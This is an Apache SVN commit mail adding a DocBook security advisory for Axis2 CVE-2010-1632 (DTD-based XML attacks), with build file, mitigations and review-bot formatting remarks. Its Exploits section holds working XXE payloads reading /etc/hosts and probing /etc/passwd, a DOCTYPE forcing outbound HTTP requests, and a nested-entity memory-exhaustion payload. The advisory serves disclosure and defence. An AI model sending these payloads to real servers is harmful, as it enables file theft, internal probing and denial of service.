Posted to java-commits@axis.apache.org by ve...@apache.org on 2010/06/27 09:51:38 UTC
svn commit: r958346 - in /axis/axis2/java/core/security: CVE-2010-1632.docx
advisory-cve-2010-1632/ advisory-cve-2010-1632/pom.xml
advisory-cve-2010-1632/src/ advisory-cve-2010-1632/src/docbkx/
advisory-cve-2010-1632/src/docbkx/CVE-2010-1632.xml
Author: veithen
Date: Sun Jun 27 07:51:38 2010
New Revision: 958346
URL: http://svn.apache.org/viewvc?rev=958346&view=rev
Log:
CVE-2010-1632: Converted the advisory document to Docbook (instead of MS Word).
Added:
axis/axis2/java/core/security/advisory-cve-2010-1632/ (with props)
axis/axis2/java/core/security/advisory-cve-2010-1632/pom.xml (with props)
axis/axis2/java/core/security/advisory-cve-2010-1632/src/
axis/axis2/java/core/security/advisory-cve-2010-1632/src/docbkx/
axis/axis2/java/core/security/advisory-cve-2010-1632/src/docbkx/CVE-2010-1632.xml (with props)
Removed:
axis/axis2/java/core/security/CVE-2010-1632.docx
Propchange: axis/axis2/java/core/security/advisory-cve-2010-1632/
------------------------------------------------------------------------------
--- svn:ignore (added)
+++ svn:ignore Sun Jun 27 07:51:38 2010
@@ -0,0 +1 @@
+target
Added: axis/axis2/java/core/security/advisory-cve-2010-1632/pom.xml
URL: http://svn.apache.org/viewvc/axis/axis2/java/core/security/advisory-cve-2010-1632/pom.xml?rev=958346&view=auto
==============================================================================
--- axis/axis2/java/core/security/advisory-cve-2010-1632/pom.xml (added)
+++ axis/axis2/java/core/security/advisory-cve-2010-1632/pom.xml Sun Jun 27 07:51:38 2010
@@ -0,0 +1,62 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!--
+ ~ Licensed to the Apache Software Foundation (ASF) under one
+ ~ or more contributor license agreements. See the NOTICE file
+ ~ distributed with this work for additional information
+ ~ regarding copyright ownership. The ASF licenses this file
+ ~ to you under the Apache License, Version 2.0 (the
+ ~ "License"); you may not use this file except in compliance
+ ~ with the License. You may obtain a copy of the License at
+ ~
+ ~ http://www.apache.org/licenses/LICENSE-2.0
+ ~
+ ~ Unless required by applicable law or agreed to in writing,
+ ~ software distributed under the License is distributed on an
+ ~ "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+ ~ KIND, either express or implied. See the License for the
+ ~ specific language governing permissions and limitations
+ ~ under the License.
+ -->
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+ xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+ <modelVersion>4.0.0</modelVersion>
+ <parent>
+ <groupId>org.apache</groupId>
+ <artifactId>apache</artifactId>
+ <version>7</version>
+ </parent>
+ <groupId>org.apache.axis2</groupId>
+ <artifactId>advisory-cve-2010-1632</artifactId>
+ <version>1</version>
+ <name>Axis2 Security Advisory CVE-2010-1632</name>
+ <packaging>pom</packaging>
+ <build>
+ <plugins>
+ <plugin>
+ <groupId>com.agilejava.docbkx</groupId>
+ <artifactId>docbkx-maven-plugin</artifactId>
+ <version>2.0.10</version>
+ <executions>
+ <execution>
+ <goals>
+ <goal>generate-pdf</goal>
+ </goals>
+ <phase>compile</phase>
+ <configuration>
+ <includes>CVE-2010-1632.xml</includes>
+ <sectionAutolabel>1</sectionAutolabel>
+ </configuration>
+ </execution>
+ </executions>
+ <dependencies>
+ <dependency>
+ <groupId>org.docbook</groupId>
+ <artifactId>docbook-xml</artifactId>
+ <version>4.4</version>
+ <scope>runtime</scope>
+ </dependency>
+ </dependencies>
+ </plugin>
+ </plugins>
+ </build>
+</project>
\ No newline at end of file
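Review bot: the new pom.xml is missing a trailing newline ("\ No newline at end of file" after `</project>`); add one so later edits to the last line do not show up as a full-line change. The rest looks consistent: the `docbook-xml` 4.4 runtime dependency matches the DocBook XML V4.4 DTD that the article declares, and binding `generate-pdf` to the `compile` phase means `mvn compile` is enough to produce the PDF.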
Propchange: axis/axis2/java/core/security/advisory-cve-2010-1632/pom.xml
------------------------------------------------------------------------------
svn:eol-style = native
Added: axis/axis2/java/core/security/advisory-cve-2010-1632/src/docbkx/CVE-2010-1632.xml
URL: http://svn.apache.org/viewvc/axis/axis2/java/core/security/advisory-cve-2010-1632/src/docbkx/CVE-2010-1632.xml?rev=958346&view=auto
==============================================================================
--- axis/axis2/java/core/security/advisory-cve-2010-1632/src/docbkx/CVE-2010-1632.xml (added)
+++ axis/axis2/java/core/security/advisory-cve-2010-1632/src/docbkx/CVE-2010-1632.xml Sun Jun 27 07:51:38 2010
@@ -0,0 +1,479 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE article PUBLIC "-//OASIS//DTD DocBook XML V4.4//EN" "http://www.oasis-open.org/docbook/xml/4.4/docbookx.dtd">
+<!--
+ ~ Licensed to the Apache Software Foundation (ASF) under one
+ ~ or more contributor license agreements. See the NOTICE file
+ ~ distributed with this work for additional information
+ ~ regarding copyright ownership. The ASF licenses this file
+ ~ to you under the Apache License, Version 2.0 (the
+ ~ "License"); you may not use this file except in compliance
+ ~ with the License. You may obtain a copy of the License at
+ ~
+ ~ http://www.apache.org/licenses/LICENSE-2.0
+ ~
+ ~ Unless required by applicable law or agreed to in writing,
+ ~ software distributed under the License is distributed on an
+ ~ "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+ ~ KIND, either express or implied. See the License for the
+ ~ specific language governing permissions and limitations
+ ~ under the License.
+ -->
+<article>
+ <articleinfo>
+ <title>Apache Axis2 Security Advisory (CVE-2010-1632)</title>
+ <subtitle>HTTP binding (REST) enables DTD based XML attacks</subtitle>
+ <author>
+ <firstname>Andreas</firstname>
+ <surname>Veithen</surname>
+ <email>veithen@apache.org</email>
+ </author>
+ <releaseinfo>First version: May 16, 2010 ⢠First published: June 13, 2010 ⢠Last updated: June 13, 2010</releaseinfo>
+ </articleinfo>
+ <section>
+ <title>Description</title>
+ <para>
+ According to the SOAP 1.1 specification, <quote>A SOAP message MUST NOT contain a
+ Document Type Declaration.</quote> In Axis2, this constraint is enforced by the
+ <classname>StAXSOAPModelBuilder</classname> class, which is part of Axiom. This
+ approach presents two issues:
+ </para>
+ <itemizedlist>
+ <listitem>
+ <para>
+ It only works for SOAP bindings. HTTP bindings supporting plain XML messages
+ still allow document type declarations in request messages.
+ </para>
+ </listitem>
+ <listitem>
+ <para>
+ When processing a document with a document type declaration,
+ <classname>StAXSOAPModelBuilder</classname> only reports an error after
+ receiving the DTD event from the StAX parser. However, at this point,
+ the StAX parser may already have processed (part of) the document type declaration.
+ </para>
+ </listitem>
+ </itemizedlist>
+ <para>
+ This implies that Axis2 is vulnerable to DTD based XML attacks. There are two types of such attacks:
+ </para>
+ <itemizedlist>
+ <listitem>
+ <para>
+ Document type declarations may reference other documents, namely a DTD or
+ external entities declared in the internal subset. If the XML parser is
+ configured with a default entity resolver (which is the case for Axis2), this
+ allows an attacker to instruct the parser to access arbitrary files. Since URLs
+ may be used as system IDs, this includes remote resources accessible only in the
+ network where the server is deployed. An attacker may exploit this in several ways:
+ </para>
+ <itemizedlist>
+ <listitem>
+ <para>
+ By inspecting the error message in the service response, he may be able to
+ scan for the presence of certain files on the local file system of the server
+ or for the availability of certain network resources accessible to the server.
+ </para>
+ </listitem>
+ <listitem>
+ <para>
+ By including an internal subset in the document type declaration of the
+ request and using external entity declarations, he may be able to include
+ the content of arbitrary files (local to the server) in the request.
+ There are many services that produce responses that include information
+ from the request message (either as part of a normal response or a SOAP fault).
+ By carefully crafting the request, the attacker may thus be able to retrieve
+ the content of arbitrary files from the server.
+ </para>
+ </listitem>
+ <listitem>
+ <para>
+ Using URLs with the âhttpâ scheme, the attacker may use the vulnerability
+ to let the server execute arbitrary HTTP GET requests and attack other
+ systems that have some form of trust relationship with the Axis2 server.
+ </para>
+ </listitem>
+ </itemizedlist>
+ </listitem>
+ <listitem>
+ <para>
+ While XML does not allow recursive entity definitions, it does permit nested
+ entity definitions. If a document has very deeply nested entity definitions,
+ parsing that document can result in very high CPU and memory consumption during
+ entity expansion. This produces the potential for Denial of Service attacks.
+ </para>
+ </listitem>
+ </itemizedlist>
+ </section>
+ <section>
+ <title>Systems affected</title>
+ <section id="axis2-affected">
+ <title>Axis2 deployments</title>
+ <para>
+ As shown in <xref linkend="solutions"/>, all Axis2 installations with versions
+ prior to 1.6 are to some extend vulnerable. The most vulnerable installations
+ are those on which at least one service is deployed that has an HTTP binding
+ accepting messages with content type <literal>application/xml</literal>, i.e.
+ for which the <literal>disableREST</literal> parameter is set to <literal>false</literal>.
+ Note that this is the default setting.
+ </para>
+ <para>
+ Even deployments with REST disabled are partially vulnerable (see
+ <xref linkend="exploit-url-access"/> and <xref linkend="exploit-dos"/>).
+ In addition, Axis2 deployments that use a StAX implementation other
+ than Woodstox may have additional vulnerabilities also affecting SOAP
+ requests<footnote><para>Woodstox parses the document type declaration lazily,
+ i.e. only when the DTD event is consumed. In this case, the protection in
+ <classname>StAXSOAPModelBuilder</classname> is enough.</para></footnote>.
+ </para>
+ <para>
+ Note that all types of Axis2 deployments are affected by these vulnerabilities.
+ This includes standalone deployments, deployments using the WAR distribution
+ as well as Web applications embedding Axis2.
+ </para>
+ </section>
+ <section>
+ <title>Other products</title>
+ <para>
+ Axis2 is used in (or as the basis for) other products. This includes the Synapse,
+ ODE, Tuscany and Geronimo projects from the ASF, as well as several commercial
+ products. It is likely that these products are vulnerable as well.
+ </para>
+ <para>
+ It is possible that Web service frameworks other than Axis2 are affected by
+ similar vulnerabilities.
+ </para>
+ <para>
+ The exploits described in <xref linkend="exploits"/> may be used to check
+ whether a given product is vulnerable.
+ </para>
+ </section>
+ </section>
+ <section>
+ <title>Impact assessment</title>
+ <para>
+ The vulnerability described in this advisory may allow an attacker to read
+ arbitrary files on the file system of the node where Axis2 runs, provided that
+ the account running the Axis2 instance has access to these files and that
+ Java 2 security is not used to prevent file system access. An attacker may
+ also be able to retrieve unsecured resources from the network if they are
+ reachable from the Axis2 instance with URLs that are recognized by the Java
+ runtime. However, to do so, the attacker needs to create a specially crafted
+ request that requires knowledge about the services deployed on the Axis2
+ instance. Therefore, this vulnerability cannot be exploited in an automated way.
+ </para>
+ <para>
+ The vulnerability may also allow the attacker to check the file system of the
+ server (resp. network resources reachable by the server) for the existence
+ of certain files (resp. resources), as well as to carry out Denial of Service
+ attacks. These attacks donât require knowledge about the services deployed
+ on Axis2 and may thus be exploited using scripting.
+ </para>
+ <para>
+ It is important that all users of Axis2 (and derived products) who have
+ deployments that accept XML messages from untrusted sources take appropriate
+ actions to mitigate the risk caused by the vulnerability described in this
+ advisory. This also applies to users who have secured their installations
+ using WS-Security (Rampart).
+ </para>
+ </section>
+ <section id="solutions">
+ <title>Solutions</title>
+ <para>
+ In order to avoid the vulnerability described in this advisory, apply one of
+ the solutions explained in the following sections.
+ </para>
+ <section>
+ <title>Upgrade to Axis2 1.5.2 or 1.6</title>
+ <para>
+ The security issue described in this advisory is fixed in Axis2 1.5.2 and 1.6.
+ These releases forbid document type declarations even for
+ <literal>application/xml</literal> documents. Therefore upgrading to one of
+ these versions is the best solution. Note that at the date of writing,
+ neither Axis2 1.5.2 nor Axis2 1.6 has been released yet. However,
+ snapshot versions are available.
+ </para>
+ </section>
+ <section id="solution-disable-application-xml">
+ <title>Disable support for the application/xml content type</title>
+ <para>
+ This solution only applies to users who donât need REST support.
+ </para>
+ <para>
+ As explained in <xref linkend="axis2-affected"/>, disabling REST
+ support (using the <literal>disableREST</literal> parameter) partially
+ solves the issue, but still leaves the system vulnerable to some types
+ of attacks. Since the issue is caused by the component responsible for
+ processing messages with content type <literal>application/xml</literal>,
+ the only effective solution is to disable this component. It is
+ configured in <filename>axis2.xml</filename> using the following declaration:
+ </para>
+<programlisting><![CDATA[<messageBuilder contentType="application/xml"
+ class="org.apache.axis2.builder.ApplicationXMLBuilder"/>]]></programlisting>
+ <para>
+ However, it is <emphasis role="strong">not</emphasis> sufficient to just remove
+ this declaration. The reason is that Axis2 registers
+ <classname>ApplicationXMLBuilder</classname> by default, even if there is
+ no explicit declaration for it in <filename>axis2.xml</filename>. Therefore
+ the only way to disable this component is to override the mapping for the
+ <literal>application/xml</literal> content type with a message builder
+ that doesnât have the same vulnerability. The recommended way is to
+ replace <classname>ApplicationXMLBuilder</classname> by <classname>SOAPBuilder</classname>:
+ </para>
+<programlisting><messageBuilder contentType="application/xml"
+ class="org.apache.axis2.builder.<emphasis role="strong">SOAPBuilder</emphasis>"/></programlisting>
+ <para>
+ The effect of this is that messages with content type <literal>application/xml</literal>
+ are no longer processed as plain XML messages, but as SOAP messages.
+ </para>
+ <para>
+ In addition to this configuration change, it is also necessary to make sure that
+ Axis2 uses Woodstox as its StAX implementation. This is the case if
+ <filename>wstx-asl-x.y.z.jar</filename> is in the classpath.
+ </para>
+ </section>
+ <section>
+ <title>Apply a security fix</title>
+ <para>
+ A fix for the issue described in this advisory is available in source code form from the following location:
+ </para>
+ <para>
+ <ulink url="https://svn.apache.org/repos/asf/axis/axis2/java/core/security/secfix-cve-2010-1632"/>
+ </para>
+ <para>
+ It has been successfully tested with Axis2 1.4.1 and 1.5.1. In order to apply the fix,
+ execute the following steps:
+ </para>
+ <procedure>
+ <step>
+ <para>
+ Check out the project from Subversion:
+ </para>
+ <screen>svn co https://svn.apache.org/repos/asf/axis/axis2/java/core/
+security/secfix-cve-2010-1632</screen>
+ </step>
+ <step>
+ <para>
+ Change into the <filename>secfix-cve-2010-1632</filename> directory and
+ build the project using <ulink url="http://maven.apache.org/">Maven</ulink>:
+ </para>
+ <screen>mvn package</screen>
+ </step>
+ <step>
+ <para>
+ Copy the JAR from the <filename>target</filename> folder and add it to
+ the Axis2 classpath. For the standalone distribution, this means adding
+ the JAR to the <filename>lib</filename> folder. For WAR deployments,
+ add it to <filename>WEB-INF/lib</filename>.
+ </para>
+ </step>
+ <step>
+ <para>
+ Open the <filename>axis2.xml</filename> configuration file and locate the
+ following entry:
+ </para>
+<programlisting><![CDATA[<messageBuilder contentType="application/xml"
+ class="org.apache.axis2.builder.ApplicationXMLBuilder"/>]]></programlisting>
+ <para>
+ Replace <classname>ApplicationXMLBuilder</classname> by
+ <classname>SecureApplicationXMLBuilder</classname>, as shown below:
+ </para>
+<programlisting><messageBuilder contentType="application/xml"
+ class="org.apache.axis2.builder.<emphasis role="strong">SecureApplicationXMLBuilder</emphasis>"/></programlisting>
+ <para>
+ Note that in the default <filename>axis2.xml</filename> configuration
+ file shipped with Axis2 1.4.1, the <sgmltag class="element">messageBuilder</sgmltag>
+ entry for <classname>ApplicationXMLBuilder</classname> is duplicated.
+ The second entry must be removed in order for the change to take effect.
+ </para>
+ </step>
+ </procedure>
+ <para>
+ As with the solution described in <xref linkend="solution-disable-application-xml"/>,
+ also check that Woodstox is present in the classpath.
+ </para>
+ </section>
+ </section>
+ <section id="exploits">
+ <title>Exploits</title>
+ <section>
+ <title>Remote file access</title>
+ <para>
+ The vulnerability can be demonstrated using a stock Axis2 1.5.1 distribution into which the
+ SimpleStockQuoteService from the Apache Synapse project has been
+ deployed<footnote><para><ulink url="http://svn.apache.org/repos/asf/synapse/trunk/java/modules/samples/services/SimpleStockQuoteService/"/></para></footnote>.
+ The request that exposes the vulnerability is as follows:
+ </para>
+<programlisting><![CDATA[<!DOCTYPE getQuote [
+ <!ENTITY file SYSTEM "/etc/hosts">
+]>
+<getQuote xmlns="http://services.samples">
+ <request>
+ <symbol xmlns="http://services.samples/xsd">&file;</symbol>
+ </request>
+</getQuote>]]></programlisting>
+ <para>
+ Sending this request to the SimpleStockQuoteService
+ endpoint<footnote><para>http://localhost:8080/axis2/services/SimpleStockQuoteService</para></footnote>
+ using <literal>application/xml</literal> as content type gives the following response:
+ </para>
+<programlisting><![CDATA[<ns:getQuoteResponse xmlns:ns="http://services.samples">
+ <ns:return xsi:type="ax21:GetQuoteResponse"
+ xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+ xmlns:ax21="http://services.samples/xsd">
+ <ax21:change>3.9659262974249048</ax21:change>
+ <ax21:earnings>12.755839004148722</ax21:earnings>
+ <ax21:high>-157.5738168969912</ax21:high>
+ <ax21:last>157.71363587000337</ax21:last>
+ <ax21:lastTradeTimestamp>
+ Sun May 16 14:25:19 CEST 2010
+ </ax21:lastTradeTimestamp>
+ <ax21:low>164.30154930689852</ax21:low>
+ <ax21:marketCap>-4192110.249723876</ax21:marketCap>
+ <ax21:name>##
+# Host Database
+#
+# localhost is used to configure the loopback interface
+# when the system is booting. Do not change this entry.
+##
+127.0.0.1 localhost
+255.255.255.255 broadcasthost
+::1 localhost
+fe80::1%lo0 localhost
+ Company</ax21:name>
+ <ax21:open>-154.31609570318096</ax21:open>
+ <ax21:peRatio>23.935652759459877</ax21:peRatio>
+ <ax21:percentageChange>2.204736746512539</ax21:percentageChange>
+ <ax21:prevClose>179.88207905992505</ax21:prevClose>
+ <ax21:symbol>##
+# Host Database
+#
+# localhost is used to configure the loopback interface
+# when the system is booting. Do not change this entry.
+##
+127.0.0.1 localhost
+255.255.255.255 broadcasthost
+::1 localhost
+fe80::1%lo0 localhost</ax21:symbol>
+ <ax21:volume>7235</ax21:volume>
+ </ns:return>
+</ns:getQuoteResponse>]]></programlisting>
+ <para>
+ As can be seen, the response includes the full content of the
+ <filename>/etc/hosts</filename> file. While this leverages a particular
+ feature of the SimpleStockQuoteService, it is expected that a similar
+ attack can be performed with many real world services.
+ </para>
+ <para>
+ It should also be noted that this attack only works if the
+ <literal>disableREST</literal> parameter (see <filename>axis2.xml</filename>)
+ is set to <literal>false</literal>. If REST is disabled, the attack is no
+ longer possible and the response from the service will be as follows:
+ </para>
+ <programlisting><![CDATA[<faultstring>Http binding is disabled for this service.</faultstring>]]></programlisting>
+ </section>
+ <section id="exploit-url-access">
+ <title>Server file system scan and arbitrary HTTP GET request execution</title>
+ <para>
+ Even when REST is disabled, the vulnerability can still be exploited to
+ check the existence of a particular file on the server file system.
+ Consider the following request (again with content type <literal>application/xml</literal>):
+ </para>
+<programlisting><![CDATA[<!DOCTYPE root SYSTEM "/etc/passwd">
+<root/>]]></programlisting>
+ <para>
+ When sent to any valid endpoint, this triggers the following response, assuming that
+ Axis2 is installed on a Unix system:
+ </para>
+<programlisting><![CDATA[<faultstring>[com.ctc.wstx.exc.WstxLazyException]
+Unexpected character '#' (code 35) in external DTD subset;
+expected a '<' to start a directive
+ at [row,col,system-id]: [1,1,"file:/etc/passwd"]
+ from [row,col {unknown-source}]: [1,1]</faultstring>]]></programlisting>
+ <para>
+ On a non Unix system or if the DOCTYPE declaration refers to a non existing
+ file, the response will be different:
+ </para>
+<programlisting><![CDATA[<faultstring>[com.ctc.wstx.exc.WstxLazyException]
+(was java.io.FileNotFoundException) /non_existing_file
+(No such file or directory)
+ at [row,col {unknown-source}]: [1,43]</faultstring>]]></programlisting>
+ <para>
+ By inspecting the response, an attacker can easily determine whether or not
+ a given file exists on the file system of the server.
+ </para>
+ <para>
+ The same technique can also be used to trick Axis2 into executing
+ arbitrary HTTP GET requests (including query parameters):
+ </para>
+<programlisting><![CDATA[<!DOCTYPE root SYSTEM "http://www.google.com/search?q=test">
+<root/>]]></programlisting>
+ </section>
+ <section id="exploit-dos">
+ <title>Denial of Service</title>
+ <para>
+ A Denial of Service attack using deeply nested entity definitions can
+ easily be demonstrated using the following request:
+ </para>
+<programlisting><![CDATA[<!DOCTYPE root [
+ <!ENTITY x32 "foobar">
+ <!ENTITY x31 "&x32;&x32;">
+ <!ENTITY x30 "&x31;&x31;">
+ <!ENTITY x29 "&x30;&x30;">
+ <!ENTITY x28 "&x29;&x29;">
+ <!ENTITY x27 "&x28;&x28;">
+ <!ENTITY x26 "&x27;&x27;">
+ <!ENTITY x25 "&x26;&x26;">
+ <!ENTITY x24 "&x25;&x25;">
+ <!ENTITY x23 "&x24;&x24;">
+ <!ENTITY x22 "&x23;&x23;">
+ <!ENTITY x21 "&x22;&x22;">
+ <!ENTITY x20 "&x21;&x21;">
+ <!ENTITY x19 "&x20;&x20;">
+ <!ENTITY x18 "&x19;&x19;">
+ <!ENTITY x17 "&x18;&x18;">
+ <!ENTITY x16 "&x17;&x17;">
+ <!ENTITY x15 "&x16;&x16;">
+ <!ENTITY x14 "&x15;&x15;">
+ <!ENTITY x13 "&x14;&x14;">
+ <!ENTITY x12 "&x13;&x13;">
+ <!ENTITY x11 "&x12;&x12;">
+ <!ENTITY x10 "&x11;&x11;">
+ <!ENTITY x9 "&x10;&x10;">
+ <!ENTITY x8 "&x9;&x9;">
+ <!ENTITY x7 "&x8;&x8;">
+ <!ENTITY x6 "&x7;&x7;">
+ <!ENTITY x5 "&x6;&x6;">
+ <!ENTITY x4 "&x5;&x5;">
+ <!ENTITY x3 "&x4;&x4;">
+ <!ENTITY x2 "&x3;&x3;">
+ <!ENTITY x1 "&x2;&x2;">
+]>
+<root attr="&x1;"/>]]></programlisting>
+ <para>
+ When sent with content type <literal>application/xml</literal> to any
+ valid endpoint, this request will cause an out of memory condition
+ on the server. This works even if REST is disabled. The reason is that
+ before checking if the request is acceptable, Axis2 needs to parse
+ the start tag of the document element. The expansion of the entity
+ used in the attribute on this element will then cause an out of memory error.
+ </para>
+ </section>
+ </section>
+ <section>
+ <title>References</title>
+ <para>
+ The issue that causes the vulnerability exposed in the present advisory was
+ initially described in JIRA report
+ AXIS2-4450<footnote><para><ulink url="https://issues.apache.org/jira/browse/AXIS2-4450"/></para></footnote>.
+ </para>
+ </section>
+ <section>
+ <title>Contact</title>
+ <para>
+ Please send all security relevant comments (e.g. about additional
+ vulnerabilities not identified by this advisory) to <email>security@apache.org</email>.
+ Questions and comments that are not security relevant may be sent to
+ the public <email>java-dev@axis.apache.org</email> mailing list.
+ </para>
+ </section>
+</article>
\ No newline at end of file
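Review bot: the two listings that highlight the class name with `<emphasis>` (the `SOAPBuilder` and `SecureApplicationXMLBuilder` entries) are not wrapped in CDATA like the other listings, so the leading `<messageBuilder` and the `"/>` at the end must be written as `&lt;` and `&gt;` entities; as displayed here they appear as raw angle brackets with an `<emphasis>` element nested inside an attribute value, which is not well-formed XML and would make the docbkx build fail. Please confirm the entities are present in the committed file. Second, the document declares UTF-8 but several characters render as mojibake (the bullet separators in `<releaseinfo>`, the quotes around "http", and the apostrophes in "don't" in the impact and solutions sections), which suggests the text was pasted from the Word original in a different encoding; replacing them with plain ASCII apostrophes and a character reference such as `&#8226;` for the bullet avoids the problem regardless of the editor's encoding. Minor wording: "to some extend vulnerable" should read "to some extent vulnerable", and "non Unix" / "non existing" should be hyphenated. Also note the file itself ends without a trailing newline.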
Propchange: axis/axis2/java/core/security/advisory-cve-2010-1632/src/docbkx/CVE-2010-1632.xml
------------------------------------------------------------------------------
svn:eol-style = native